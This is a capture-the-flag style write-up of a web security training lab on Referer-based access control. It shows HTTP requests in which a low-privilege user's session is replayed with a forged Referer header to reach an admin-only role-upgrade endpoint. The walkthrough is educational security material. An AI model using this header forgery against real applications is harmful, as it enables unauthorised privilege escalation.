Referer-based access control

This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

Upon gaining access with administrator credentials (administrator:admin), I explored the admin panel functionalities and identified the "upgrade" feature for elevating user roles. I initiated the upgrade process for the user "carlos" and observed the request in Burp Repeater:

GET /admin-roles?username=carlos&action=upgrade HTTP/2
Host: 0a03008b03196db281dd34d8000f0071.web-security-academy.net
Cookie: session=KaL8iUX09a7TMlllNRH7T1BwmdGveu78
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
...

Subsequently, when attempting to perform the same upgrade as the user "wiener" by replacing the session cookie, I encountered an "unauthorized" response. To circumvent this, I added the "Referer" header with the value "/admin" to indicate that the upgrade request originated from the "/admin" page, which is considered trustworthy by the server. The modified request was:

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a03008b03196db281dd34d8000f0071.web-security-academy.net
Referer: https://0a03008b03196db281dd34d8000f0071.web-security-academy.net/admin
Cookie: session=yE1iudSPDaSRypd59IWH9mjhU93l9n6T
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
...

By providing the proper Referer header, I successfully upgraded the "wiener" user to admin and solved the lab.

PreviousMulti-step process with no access control on one step NextFile Upload

Last updated 2 years ago